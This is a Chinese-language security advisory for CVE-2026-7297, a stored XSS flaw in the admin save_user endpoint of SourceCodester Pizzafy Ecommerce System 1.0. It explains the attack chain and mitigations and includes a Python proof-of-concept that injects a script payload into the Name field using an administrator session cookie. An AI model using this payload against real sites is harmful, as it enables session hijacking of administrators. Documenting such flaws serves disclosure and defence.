CVE-2026-7297 CVSS 2.4 低危

CVE-2026-7297: SourceCodester Pizzafy Ecommerce System XSS漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7297

漏洞类型

XSS (跨站脚本)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Pizzafy Ecommerce System

漏洞概述

SourceCodester Pizzafy Ecommerce System 1.0 版本存在跨站脚本（XSS）漏洞。该漏洞位于 `/admin/ajax.php` 文件的 `save_user` 接口，由于未对用户提交的 `Name` 参数进行严格的过滤和转义，攻击者可诱导管理员点击恶意链接或提交恶意数据，从而在受害者浏览器中执行任意JavaScript代码，窃取Cookie或进行会话劫持。

技术细节

该漏洞属于存储型XSS，核心问题在于 `/admin/ajax.php` 文件中的 `save_user` 函数未正确处理 `Name` 参数。由于系统缺乏输出编码，攻击者可以将恶意 JavaScript 代码注入到用户名字段中。当管理员或用户访问显示该用户名的页面时，注入的脚本将在浏览器上下文中执行。鉴于 CVSS 评分中要求高权限（PR:H），攻击者通常需要具备管理员权限才能触发数据保存操作，或者通过社工诱导管理员进行操作。

攻击链分析

STEP 1

攻击者获取管理员权限或诱导已登录的管理员访问恶意页面（利用PR:H权限）。

STEP 2

攻击者向 `/admin/ajax.php?action=save_user` 发送 POST 请求，在 `Name` 参数中注入恶意 JavaScript 脚本。

STEP 3

服务器将包含恶意脚本的 `Name` 数据存储在数据库中，且未进行转义处理。

STEP 4

当管理员或其他用户访问包含该用户名的页面（如用户列表）时，恶意脚本在浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://target.com/admin/ajax.php?action=save_user"

# Attacker's session cookie (High privilege required)
cookies = {
    "PHPSESSID": "valid_admin_session_id"
}

# Malicious payload injected into the 'Name' argument
xss_payload = "<script>alert('CVE-2026-7297 XSS');</script>"

# POST data to trigger the vulnerability
post_data = {
    "Name": xss_payload,
    "Username": "attacker",
    "Password": "password123"
}

try:
    response = requests.post(target_url, data=post_data, cookies=cookies)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check the user management page for XSS trigger.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施

建议管理员在修复补丁发布前，严格限制后台管理账户的分配，并审查系统中的用户数据是否存在异常脚本字符。开发人员应立即在 `save_user` 函数中对 `Name` 参数进行过滤或使用输出编码技术。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7297
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7297
3 Details https://www.cvedetails.com/cve/CVE-2026-7297/
4 VulDB https://vuldb.com/cve/CVE-2026-7297
5 Link https://github.com/joaodrmmd/VulDB-Reports/blob/main/XSS%20-%20Users.pdf
6 Link https://vuldb.com/submit/803176
7 Link https://vuldb.com/vuln/359957
8 Link https://vuldb.com/vuln/359957/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表